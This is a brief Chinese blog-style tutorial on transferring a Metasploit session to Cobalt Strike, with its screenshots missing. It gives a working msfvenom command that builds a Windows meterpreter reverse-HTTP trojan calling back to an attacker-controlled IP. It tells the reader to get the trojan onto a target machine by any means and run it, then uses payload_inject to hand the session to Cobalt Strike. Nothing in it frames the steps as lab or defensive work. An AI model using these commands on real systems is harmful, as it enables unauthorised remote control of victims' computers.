Meteasploit -> CS 【会话转移】

2021/8/31 17:36:19

本文主要是介绍Meteasploit -> CS 【会话转移】,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

流程:

  大致流程,msfvenom生成木马->目标机运行木马->msf监听到会话->转移到CS

开始:

  先让服务端的CS上线

  

  cs客户端连接cs服务端

  

  

  cs设置监听

 

 

 

   生成木马  msfvenom -p windows/x64/meterpreter_reverse_http lhost=104.xx.xx.xx lport=6677 -f exe -o msf1.exe

 

 

   生成后开启监听模块

 

 

   查看详细常数

  

  

 

   设置set exitonsession false

   exploit -j 开始执行

 

 

  然后把木马msf1.exe想办法弄到目标机上且运行起来,拿到会话如下

  

 

  拿到回话之后,重新设置新模块use exploit/windows/local/payload_inject

 

 

  设置参数

 

 

   设置完毕后开始执行!run

 

 

   转移成功

 



这篇关于Meteasploit -> CS 【会话转移】的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程